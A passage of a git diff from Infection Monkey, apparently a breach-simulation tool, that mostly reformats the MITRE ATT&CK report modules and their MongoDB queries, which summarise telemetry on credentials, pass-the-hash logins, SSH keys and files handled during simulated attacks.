- "necessary": True,
- "link": "https://attack.mitre.org/techniques/T1041",
- "description": "Data exfiltration is performed over the Command and Control channel.",
+ "exfiltration":{
+ "title":"Exfiltration",
+ "type":"object",
+ "link":"https://attack.mitre.org/tactics/TA0010/",
+ "properties":{
+ "T1041":{
+ "title":"Exfiltration Over Command and Control Channel",
+ "type":"bool",
+ "value":True,
+ "necessary":True,
+ "link":"https://attack.mitre.org/techniques/T1041",
+ "description":"Data exfiltration is performed over the Command and Control "
+ "channel.",
}
},
},
diff --git a/monkey/monkey_island/cc/services/attack/mitre_api_interface.py b/monkey/monkey_island/cc/services/attack/mitre_api_interface.py
index fa0707b41..75412cd23 100644
--- a/monkey/monkey_island/cc/services/attack/mitre_api_interface.py
+++ b/monkey/monkey_island/cc/services/attack/mitre_api_interface.py
@@ -4,7 +4,6 @@ from stix2 import AttackPattern, CourseOfAction, FileSystemSource, Filter
class MitreApiInterface:
-
ATTACK_DATA_PATH = "monkey_island/cc/services/attack/attack_data/enterprise-attack"
@staticmethod
@@ -12,7 +11,7 @@ class MitreApiInterface:
file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH)
mitigation_filter = [Filter("type", "=", "course-of-action")]
all_mitigations = file_system.query(mitigation_filter)
- all_mitigations = {mitigation["id"]: mitigation for mitigation in all_mitigations}
+ all_mitigations = {mitigation["id"]:mitigation for mitigation in all_mitigations}
return all_mitigations
@staticmethod
@@ -20,7 +19,7 @@ class MitreApiInterface:
file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH)
technique_filter = [Filter("type", "=", "attack-pattern")]
all_techniques = file_system.query(technique_filter)
- all_techniques = {technique["id"]: technique for technique in all_techniques}
+ all_techniques = {technique["id"]:technique for technique in all_techniques}
return all_techniques
@staticmethod
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py
index 0bf2e649b..bcd4808e5 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py
@@ -8,24 +8,27 @@ __author__ = "VakarisZ"
class T1003(AttackTechnique):
tech_id = "T1003"
- unscanned_msg = "Monkey tried to obtain credentials from systems in the network but didn't find any or failed."
+ unscanned_msg = (
+ "Monkey tried to obtain credentials from systems in the network but didn't "
+ "find any or failed."
+ )
scanned_msg = ""
used_msg = "Monkey successfully obtained some credentials from systems on the network."
query = {
- "$or": [
+ "$or":[
{
- "telem_category": "system_info",
- "$and": [
- {"data.credentials": {"$exists": True}},
- {"data.credentials": {"$gt": {}}},
+ "telem_category":"system_info",
+ "$and":[
+ {"data.credentials":{"$exists":True}},
+ {"data.credentials":{"$gt":{}}},
],
}, # $gt: {} checks if field is not an empty object
{
- "telem_category": "exploit",
- "$and": [
- {"data.info.credentials": {"$exists": True}},
- {"data.info.credentials": {"$gt": {}}},
+ "telem_category":"exploit",
+ "$and":[
+ {"data.info.credentials":{"$exists":True}},
+ {"data.info.credentials":{"$gt":{}}},
],
},
]
@@ -41,7 +44,7 @@ class T1003(AttackTechnique):
status = ScanStatus.UNSCANNED.value
return (status, [])
- data = {"title": T1003.technique_title()}
+ data = {"title":T1003.technique_title()}
status, _ = get_technique_status_and_data()
data.update(T1003.get_message_and_status(status))
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py
index 83d4bc3b6..74cfb6ac6 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py
@@ -11,44 +11,44 @@ class T1005(AttackTechnique):
used_msg = "Monkey successfully gathered sensitive data from local system."
query = [
- {"$match": {"telem_category": "attack", "data.technique": tech_id}},
+ {"$match":{"telem_category":"attack", "data.technique":tech_id}},
{
- "$lookup": {
- "from": "monkey",
- "localField": "monkey_guid",
- "foreignField": "guid",
- "as": "monkey",
+ "$lookup":{
+ "from":"monkey",
+ "localField":"monkey_guid",
+ "foreignField":"guid",
+ "as":"monkey",
}
},
{
- "$project": {
- "monkey": {"$arrayElemAt": ["$monkey", 0]},
- "status": "$data.status",
- "gathered_data_type": "$data.gathered_data_type",
- "info": "$data.info",
+ "$project":{
+ "monkey":{"$arrayElemAt":["$monkey", 0]},
+ "status":"$data.status",
+ "gathered_data_type":"$data.gathered_data_type",
+ "info":"$data.info",
}
},
{
- "$addFields": {
- "_id": 0,
- "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"},
- "monkey": 0,
+ "$addFields":{
+ "_id":0,
+ "machine":{"hostname":"$monkey.hostname", "ips":"$monkey.ip_addresses"},
+ "monkey":0,
}
},
{
- "$group": {
- "_id": {
- "machine": "$machine",
- "gathered_data_type": "$gathered_data_type",
- "info": "$info",
+ "$group":{
+ "_id":{
+ "machine":"$machine",
+ "gathered_data_type":"$gathered_data_type",
+ "info":"$info",
}
}
},
- {"$replaceRoot": {"newRoot": "$_id"}},
+ {"$replaceRoot":{"newRoot":"$_id"}},
]
@staticmethod
def get_report_data():
data = T1005.get_tech_base_data()
- data.update({"collected_data": list(mongo.db.telemetry.aggregate(T1005.query))})
+ data.update({"collected_data":list(mongo.db.telemetry.aggregate(T1005.query))})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py
index 594c593d5..627878f91 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py
@@ -12,31 +12,31 @@ class T1016(AttackTechnique):
used_msg = "Monkey gathered network configurations on systems in the network."
query = [
- {"$match": {"telem_category": "system_info", "data.network_info": {"$exists": True}}},
+ {"$match":{"telem_category":"system_info", "data.network_info":{"$exists":True}}},
{
- "$project": {
- "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"},
- "networks": "$data.network_info.networks",
- "netstat": "$data.network_info.netstat",
+ "$project":{
+ "machine":{"hostname":"$data.hostname", "ips":"$data.network_info.networks"},
+ "networks":"$data.network_info.networks",
+ "netstat":"$data.network_info.netstat",
}
},
{
- "$addFields": {
- "_id": 0,
- "netstat": 0,
- "networks": 0,
- "info": [
+ "$addFields":{
+ "_id":0,
+ "netstat":0,
+ "networks":0,
+ "info":[
{
- "used": {
- "$and": [{"$ifNull": ["$netstat", False]}, {"$gt": ["$netstat", {}]}]
+ "used":{
+ "$and":[{"$ifNull":["$netstat", False]}, {"$gt":["$netstat", {}]}]
},
- "name": {"$literal": "Network connections (netstat)"},
+ "name":{"$literal":"Network connections (netstat)"},
},
{
- "used": {
- "$and": [{"$ifNull": ["$networks", False]}, {"$gt": ["$networks", {}]}]
+ "used":{
+ "$and":[{"$ifNull":["$networks", False]}, {"$gt":["$networks", {}]}]
},
- "name": {"$literal": "Network interface info"},
+ "name":{"$literal":"Network interface info"},
},
],
}
@@ -54,5 +54,5 @@ class T1016(AttackTechnique):
status, network_info = get_technique_status_and_data()
data = T1016.get_base_data_by_status(status)
- data.update({"network_info": network_info})
+ data.update({"network_info":network_info})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py
index 500a1a325..c4605542e 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py
@@ -12,29 +12,29 @@ class T1018(AttackTechnique):
used_msg = "Monkey found machines on the network."
query = [
- {"$match": {"telem_category": "scan"}},
- {"$sort": {"timestamp": 1}},
+ {"$match":{"telem_category":"scan"}},
+ {"$sort":{"timestamp":1}},
{
- "$group": {
- "_id": {"monkey_guid": "$monkey_guid"},
- "machines": {"$addToSet": "$data.machine"},
- "started": {"$first": "$timestamp"},
- "finished": {"$last": "$timestamp"},
+ "$group":{
+ "_id":{"monkey_guid":"$monkey_guid"},
+ "machines":{"$addToSet":"$data.machine"},
+ "started":{"$first":"$timestamp"},
+ "finished":{"$last":"$timestamp"},
}
},
{
- "$lookup": {
- "from": "monkey",
- "localField": "_id.monkey_guid",
- "foreignField": "guid",
- "as": "monkey_tmp",
+ "$lookup":{
+ "from":"monkey",
+ "localField":"_id.monkey_guid",
+ "foreignField":"guid",
+ "as":"monkey_tmp",
}
},
- {"$addFields": {"_id": 0, "monkey_tmp": {"$arrayElemAt": ["$monkey_tmp", 0]}}},
+ {"$addFields":{"_id":0, "monkey_tmp":{"$arrayElemAt":["$monkey_tmp", 0]}}},
{
- "$addFields": {
- "monkey": {"hostname": "$monkey_tmp.hostname", "ips": "$monkey_tmp.ip_addresses"},
- "monkey_tmp": 0,
+ "$addFields":{
+ "monkey":{"hostname":"$monkey_tmp.hostname", "ips":"$monkey_tmp.ip_addresses"},
+ "monkey_tmp":0,
}
},
]
@@ -53,5 +53,5 @@ class T1018(AttackTechnique):
status, scan_info = get_technique_status_and_data()
data = T1018.get_base_data_by_status(status)
- data.update({"scan_info": scan_info})
+ data.update({"scan_info":scan_info})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py
index 9fe32b4d5..5e13ba6de 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py
@@ -14,25 +14,25 @@ class T1021(AttackTechnique):
# Gets data about brute force attempts
query = [
- {"$match": {"telem_category": "exploit", "data.attempts": {"$not": {"$size": 0}}}},
+ {"$match":{"telem_category":"exploit", "data.attempts":{"$not":{"$size":0}}}},
{
- "$project": {
- "_id": 0,
- "machine": "$data.machine",
- "info": "$data.info",
- "attempt_cnt": {"$size": "$data.attempts"},
- "attempts": {
- "$filter": {
- "input": "$data.attempts",
- "as": "attempt",
- "cond": {"$eq": ["$$attempt.result", True]},
+ "$project":{
+ "_id":0,
+ "machine":"$data.machine",
+ "info":"$data.info",
+ "attempt_cnt":{"$size":"$data.attempts"},
+ "attempts":{
+ "$filter":{
+ "input":"$data.attempts",
+ "as":"attempt",
+ "cond":{"$eq":["$$attempt.result", True]},
}
},
}
},
]
- scanned_query = {"telem_category": "exploit", "data.attempts": {"$elemMatch": {"result": True}}}
+ scanned_query = {"telem_category":"exploit", "data.attempts":{"$elemMatch":{"result":True}}}
@staticmethod
def get_report_data():
@@ -56,5 +56,5 @@ class T1021(AttackTechnique):
status, attempts = get_technique_status_and_data()
data = T1021.get_base_data_by_status(status)
- data.update({"services": attempts})
+ data.update({"services":attempts})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py
index d11a74b31..38c27a47e 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py
@@ -5,12 +5,15 @@ __author__ = "VakarisZ"
class T1035(UsageTechnique):
tech_id = "T1035"
- unscanned_msg = "Monkey didn't try to interact with Windows services since it didn't run on any Windows machines."
+ unscanned_msg = (
+ "Monkey didn't try to interact with Windows services since it didn't run on "
+ "any Windows machines."
+ )
scanned_msg = "Monkey tried to interact with Windows services, but failed."
used_msg = "Monkey successfully interacted with Windows services."
@staticmethod
def get_report_data():
data = T1035.get_tech_base_data()
- data.update({"services": T1035.get_usage_data()})
+ data.update({"services":T1035.get_usage_data()})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py
index 262c18204..d026c618a 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py
@@ -18,8 +18,8 @@ class T1041(AttackTechnique):
monkeys = list(Monkey.objects())
info = [
{
- "src": monkey["command_control_channel"]["src"],
- "dst": monkey["command_control_channel"]["dst"],
+ "src":monkey["command_control_channel"]["src"],
+ "dst":monkey["command_control_channel"]["dst"],
}
for monkey in monkeys
if monkey["command_control_channel"]
@@ -33,5 +33,5 @@ class T1041(AttackTechnique):
status, info = get_technique_status_and_data()
data = T1041.get_base_data_by_status(status)
- data.update({"command_control_channel": info})
+ data.update({"command_control_channel":info})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py
index dc97ef85b..889897f7c 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py
@@ -13,16 +13,16 @@ class T1059(AttackTechnique):
query = [
{
- "$match": {
- "telem_category": "exploit",
- "data.info.executed_cmds": {"$exists": True, "$ne": []},
+ "$match":{
+ "telem_category":"exploit",
+ "data.info.executed_cmds":{"$exists":True, "$ne":[]},
}
},
- {"$unwind": "$data.info.executed_cmds"},
- {"$sort": {"data.info.executed_cmds.powershell": 1}},
- {"$project": {"_id": 0, "machine": "$data.machine", "info": "$data.info"}},
- {"$group": {"_id": "$machine", "data": {"$push": "$$ROOT"}}},
- {"$project": {"_id": 0, "data": {"$arrayElemAt": ["$data", 0]}}},
+ {"$unwind":"$data.info.executed_cmds"},
+ {"$sort":{"data.info.executed_cmds.powershell":1}},
+ {"$project":{"_id":0, "machine":"$data.machine", "info":"$data.info"}},
+ {"$group":{"_id":"$machine", "data":{"$push":"$$ROOT"}}},
+ {"$project":{"_id":0, "data":{"$arrayElemAt":["$data", 0]}}},
]
@staticmethod
@@ -37,7 +37,7 @@ class T1059(AttackTechnique):
return (status, cmd_data)
status, cmd_data = get_technique_status_and_data()
- data = {"title": T1059.technique_title(), "cmds": cmd_data}
+ data = {"title":T1059.technique_title(), "cmds":cmd_data}
data.update(T1059.get_message_and_status(status))
data.update(T1059.get_mitigation_by_status(status))
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py
index 1ca2ba62e..4e048e3c4 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py
@@ -14,5 +14,5 @@ class T1064(UsageTechnique):
def get_report_data():
data = T1064.get_tech_base_data()
script_usages = list(mongo.db.telemetry.aggregate(T1064.get_usage_query()))
- data.update({"scripts": script_usages})
+ data.update({"scripts":script_usages})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py
index 36c409531..e0e2f0f77 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py
@@ -14,38 +14,38 @@ class T1075(AttackTechnique):
used_msg = "Monkey successfully used hashed credentials."
login_attempt_query = {
- "data.attempts": {
- "$elemMatch": {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]}
+ "data.attempts":{
+ "$elemMatch":{"$or":[{"ntlm_hash":{"$ne":""}}, {"lm_hash":{"$ne":""}}]}
}
}
# Gets data about successful PTH logins
query = [
{
- "$match": {
- "telem_category": "exploit",
- "data.attempts": {
- "$not": {"$size": 0},
- "$elemMatch": {
- "$and": [
- {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]},
- {"result": True},
+ "$match":{
+ "telem_category":"exploit",
+ "data.attempts":{
+ "$not":{"$size":0},
+ "$elemMatch":{
+ "$and":[
+ {"$or":[{"ntlm_hash":{"$ne":""}}, {"lm_hash":{"$ne":""}}]},
+ {"result":True},
]
},
},
}
},
{
- "$project": {
- "_id": 0,
- "machine": "$data.machine",
- "info": "$data.info",
- "attempt_cnt": {"$size": "$data.attempts"},
- "attempts": {
- "$filter": {
- "input": "$data.attempts",
- "as": "attempt",
- "cond": {"$eq": ["$$attempt.result", True]},
+ "$project":{
+ "_id":0,
+ "machine":"$data.machine",
+ "info":"$data.info",
+ "attempt_cnt":{"$size":"$data.attempts"},
+ "attempts":{
+ "$filter":{
+ "input":"$data.attempts",
+ "as":"attempt",
+ "cond":{"$eq":["$$attempt.result", True]},
}
},
}
@@ -66,8 +66,8 @@ class T1075(AttackTechnique):
return (status, successful_logins)
status, successful_logins = get_technique_status_and_data()
- data = {"title": T1075.technique_title()}
- data.update({"successful_logins": successful_logins})
+ data = {"title":T1075.technique_title()}
+ data.update({"successful_logins":successful_logins})
data.update(T1075.get_message_and_status(status))
data.update(T1075.get_mitigation_by_status(status))
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py
index 7025a658c..64e154797 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py
@@ -12,61 +12,61 @@ class T1082(AttackTechnique):
used_msg = "Monkey gathered system info from machines in the network."
query = [
- {"$match": {"telem_category": "system_info", "data.network_info": {"$exists": True}}},
+ {"$match":{"telem_category":"system_info", "data.network_info":{"$exists":True}}},
{
- "$project": {
- "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"},
- "aws": "$data.aws",
- "netstat": "$data.network_info.netstat",
- "process_list": "$data.process_list",
- "ssh_info": "$data.ssh_info",
- "azure_info": "$data.Azure",
+ "$project":{
+ "machine":{"hostname":"$data.hostname", "ips":"$data.network_info.networks"},
+ "aws":"$data.aws",
+ "netstat":"$data.network_info.netstat",
+ "process_list":"$data.process_list",
+ "ssh_info":"$data.ssh_info",
+ "azure_info":"$data.Azure",
}
},
{
- "$project": {
- "_id": 0,
- "machine": 1,
- "collections": [
+ "$project":{
+ "_id":0,
+ "machine":1,
+ "collections":[
{
- "used": {"$and": [{"$ifNull": ["$netstat", False]}, {"$gt": ["$aws", {}]}]},
- "name": {"$literal": "Amazon Web Services info"},
+ "used":{"$and":[{"$ifNull":["$netstat", False]}, {"$gt":["$aws", {}]}]},
+ "name":{"$literal":"Amazon Web Services info"},
},
{
- "used": {
- "$and": [
- {"$ifNull": ["$process_list", False]},
- {"$gt": ["$process_list", {}]},
+ "used":{
+ "$and":[
+ {"$ifNull":["$process_list", False]},
+ {"$gt":["$process_list", {}]},
]
},
- "name": {"$literal": "Running process list"},
+ "name":{"$literal":"Running process list"},
},
{
- "used": {
- "$and": [{"$ifNull": ["$netstat", False]}, {"$ne": ["$netstat", []]}]
+ "used":{
+ "$and":[{"$ifNull":["$netstat", False]}, {"$ne":["$netstat", []]}]
},
- "name": {"$literal": "Network connections"},
+ "name":{"$literal":"Network connections"},
},
{
- "used": {
- "$and": [{"$ifNull": ["$ssh_info", False]}, {"$ne": ["$ssh_info", []]}]
+ "used":{
+ "$and":[{"$ifNull":["$ssh_info", False]}, {"$ne":["$ssh_info", []]}]
},
- "name": {"$literal": "SSH info"},
+ "name":{"$literal":"SSH info"},
},
{
- "used": {
- "$and": [
- {"$ifNull": ["$azure_info", False]},
- {"$ne": ["$azure_info", []]},
+ "used":{
+ "$and":[
+ {"$ifNull":["$azure_info", False]},
+ {"$ne":["$azure_info", []]},
]
},
- "name": {"$literal": "Azure info"},
+ "name":{"$literal":"Azure info"},
},
],
}
},
- {"$group": {"_id": {"machine": "$machine", "collections": "$collections"}}},
- {"$replaceRoot": {"newRoot": "$_id"}},
+ {"$group":{"_id":{"machine":"$machine", "collections":"$collections"}}},
+ {"$replaceRoot":{"newRoot":"$_id"}},
]
@staticmethod
@@ -81,8 +81,8 @@ class T1082(AttackTechnique):
return (status, system_info)
status, system_info = get_technique_status_and_data()
- data = {"title": T1082.technique_title()}
- data.update({"system_info": system_info})
+ data = {"title":T1082.technique_title()}
+ data.update({"system_info":system_info})
data.update(T1082.get_mitigation_by_status(status))
data.update(T1082.get_message_and_status(status))
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py
index d034d5316..439aa6d2a 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py
@@ -13,27 +13,27 @@ class T1086(AttackTechnique):
query = [
{
- "$match": {
- "telem_category": "exploit",
- "data.info.executed_cmds": {"$elemMatch": {"powershell": True}},
+ "$match":{
+ "telem_category":"exploit",
+ "data.info.executed_cmds":{"$elemMatch":{"powershell":True}},
}
},
- {"$project": {"machine": "$data.machine", "info": "$data.info"}},
+ {"$project":{"machine":"$data.machine", "info":"$data.info"}},
{
- "$project": {
- "_id": 0,
- "machine": 1,
- "info.finished": 1,
- "info.executed_cmds": {
- "$filter": {
- "input": "$info.executed_cmds",
- "as": "command",
- "cond": {"$eq": ["$$command.powershell", True]},
+ "$project":{
+ "_id":0,
+ "machine":1,
+ "info.finished":1,
+ "info.executed_cmds":{
+ "$filter":{
+ "input":"$info.executed_cmds",
+ "as":"command",
+ "cond":{"$eq":["$$command.powershell", True]},
}
},
}
},
- {"$group": {"_id": "$machine", "data": {"$push": "$$ROOT"}}},
+ {"$group":{"_id":"$machine", "data":{"$push":"$$ROOT"}}},
]
@staticmethod
@@ -48,7 +48,7 @@ class T1086(AttackTechnique):
return (status, cmd_data)
status, cmd_data = get_technique_status_and_data()
- data = {"title": T1086.technique_title(), "cmds": cmd_data}
+ data = {"title":T1086.technique_title(), "cmds":cmd_data}
data.update(T1086.get_mitigation_by_status(status))
data.update(T1086.get_message_and_status(status))
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py
index 66078e0d0..ea5fef318 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py
@@ -23,5 +23,5 @@ class T1090(AttackTechnique):
status, monkeys = get_technique_status_and_data()
data = T1090.get_base_data_by_status(status)
- data.update({"proxies": monkeys})
+ data.update({"proxies":monkeys})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py
index edcca2c2d..2a5624d11 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py
@@ -11,21 +11,21 @@ class T1105(AttackTechnique):
used_msg = "Monkey successfully copied files to systems on the network."
query = [
- {"$match": {"telem_category": "attack", "data.technique": tech_id}},
+ {"$match":{"telem_category":"attack", "data.technique":tech_id}},
{
- "$project": {
- "_id": 0,
- "src": "$data.src",
- "dst": "$data.dst",
- "filename": "$data.filename",
+ "$project":{
+ "_id":0,
+ "src":"$data.src",
+ "dst":"$data.dst",
+ "filename":"$data.filename",
}
},
- {"$group": {"_id": {"src": "$src", "dst": "$dst", "filename": "$filename"}}},
- {"$replaceRoot": {"newRoot": "$_id"}},
+ {"$group":{"_id":{"src":"$src", "dst":"$dst", "filename":"$filename"}}},
+ {"$replaceRoot":{"newRoot":"$_id"}},
]
@staticmethod
def get_report_data():
data = T1105.get_tech_base_data()
- data.update({"files": list(mongo.db.telemetry.aggregate(T1105.query))})
+ data.update({"files":list(mongo.db.telemetry.aggregate(T1105.query))})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py
index 0dfc749cc..52708a76c 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py
@@ -12,5 +12,5 @@ class T1106(UsageTechnique):
@staticmethod
def get_report_data():
data = T1106.get_tech_base_data()
- data.update({"api_uses": T1106.get_usage_data()})
+ data.update({"api_uses":T1106.get_usage_data()})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py
index 18f3a047b..83cf6cccb 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py
@@ -11,35 +11,35 @@ class T1107(AttackTechnique):
used_msg = "Monkey successfully deleted files on systems in the network."
query = [
- {"$match": {"telem_category": "attack", "data.technique": "T1107"}},
+ {"$match":{"telem_category":"attack", "data.technique":"T1107"}},
{
- "$lookup": {
- "from": "monkey",
- "localField": "monkey_guid",
- "foreignField": "guid",
- "as": "monkey",
+ "$lookup":{
+ "from":"monkey",
+ "localField":"monkey_guid",
+ "foreignField":"guid",
+ "as":"monkey",
}
},
{
- "$project": {
- "monkey": {"$arrayElemAt": ["$monkey", 0]},
- "status": "$data.status",
- "path": "$data.path",
+ "$project":{
+ "monkey":{"$arrayElemAt":["$monkey", 0]},
+ "status":"$data.status",
+ "path":"$data.path",
}
},
{
- "$addFields": {
- "_id": 0,
- "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"},
- "monkey": 0,
+ "$addFields":{
+ "_id":0,
+ "machine":{"hostname":"$monkey.hostname", "ips":"$monkey.ip_addresses"},
+ "monkey":0,
}
},
- {"$group": {"_id": {"machine": "$machine", "status": "$status", "path": "$path"}}},
+ {"$group":{"_id":{"machine":"$machine", "status":"$status", "path":"$path"}}},
]
@staticmethod
def get_report_data():
data = T1107.get_tech_base_data()
deleted_files = list(mongo.db.telemetry.aggregate(T1107.query))
- data.update({"deleted_files": deleted_files})
+ data.update({"deleted_files":deleted_files})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py
index 118371ac5..cbdf7b683 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py
@@ -14,18 +14,18 @@ class T1110(AttackTechnique):
# Gets data about brute force attempts
query = [
- {"$match": {"telem_category": "exploit", "data.attempts": {"$not": {"$size": 0}}}},
+ {"$match":{"telem_category":"exploit", "data.attempts":{"$not":{"$size":0}}}},
{
- "$project": {
- "_id": 0,
- "machine": "$data.machine",
- "info": "$data.info",
- "attempt_cnt": {"$size": "$data.attempts"},
- "attempts": {
- "$filter": {
- "input": "$data.attempts",
- "as": "attempt",
- "cond": {"$eq": ["$$attempt.result", True]},
+ "$project":{
+ "_id":0,
+ "machine":"$data.machine",
+ "info":"$data.info",
+ "attempt_cnt":{"$size":"$data.attempts"},
+ "attempts":{
+ "$filter":{
+ "input":"$data.attempts",
+ "as":"attempt",
+ "cond":{"$eq":["$$attempt.result", True]},
}
},
}
@@ -59,5 +59,5 @@ class T1110(AttackTechnique):
# Remove data with no successful brute force attempts
attempts = [attempt for attempt in attempts if attempt["attempts"]]
- data.update({"services": attempts})
+ data.update({"services":attempts})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py
index e0d079d7e..136a55a4e 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py
@@ -14,5 +14,5 @@ class T1129(UsageTechnique):
@staticmethod
def get_report_data():
data = T1129.get_tech_base_data()
- data.update({"dlls": T1129.get_usage_data()})
+ data.update({"dlls":T1129.get_usage_data()})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py
index 82dccf639..4a8be918e 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py
@@ -14,16 +14,16 @@ class T1145(AttackTechnique):
# Gets data about ssh keys found
query = [
{
- "$match": {
- "telem_category": "system_info",
- "data.ssh_info": {"$elemMatch": {"private_key": {"$exists": True}}},
+ "$match":{
+ "telem_category":"system_info",
+ "data.ssh_info":{"$elemMatch":{"private_key":{"$exists":True}}},
}
},
{
- "$project": {
- "_id": 0,
- "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"},
- "ssh_info": "$data.ssh_info",
+ "$project":{
+ "_id":0,
+ "machine":{"hostname":"$data.hostname", "ips":"$data.network_info.networks"},
+ "ssh_info":"$data.ssh_info",
}
},
]
@@ -42,5 +42,5 @@ class T1145(AttackTechnique):
status, ssh_info = get_technique_status_and_data()
data = T1145.get_base_data_by_status(status)
- data.update({"ssh_info": ssh_info})
+ data.update({"ssh_info":ssh_info})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py
index 9391e52e9..6504e7cff 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py
@@ -17,19 +17,19 @@ class T1146(PostBreachTechnique):
def get_pba_query(*args):
return [
{
- "$match": {
- "telem_category": "post_breach",
- "data.name": POST_BREACH_CLEAR_CMD_HISTORY,
+ "$match":{
+ "telem_category":"post_breach",
+ "data.name":POST_BREACH_CLEAR_CMD_HISTORY,
}
},
{
- "$project": {
- "_id": 0,
- "machine": {
- "hostname": {"$arrayElemAt": ["$data.hostname", 0]},
- "ips": [{"$arrayElemAt": ["$data.ip", 0]}],
+ "$project":{
+ "_id":0,
+ "machine":{
+ "hostname":{"$arrayElemAt":["$data.hostname", 0]},
+ "ips":[{"$arrayElemAt":["$data.ip", 0]}],
},
- "result": "$data.result",
+ "result":"$data.result",
}
},
]
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py
index abd32f78f..19af84ffd 100644
